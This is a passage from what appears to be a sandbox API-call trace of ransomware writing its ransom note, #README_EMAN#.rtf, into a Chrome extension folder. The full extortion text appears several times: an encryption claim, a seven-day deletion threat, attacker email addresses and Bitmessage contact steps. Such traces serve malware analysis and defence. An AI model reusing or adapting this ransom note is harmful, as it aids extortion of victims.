ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.799] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.799] CloseHandle (hObject=0x284) returned 1 [0269.799] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\#readme_eman#.rtf")) returned 0xffffffff [0269.799] GetLastError () returned 0x2 [0269.799] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0269.800] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.800] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.800] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 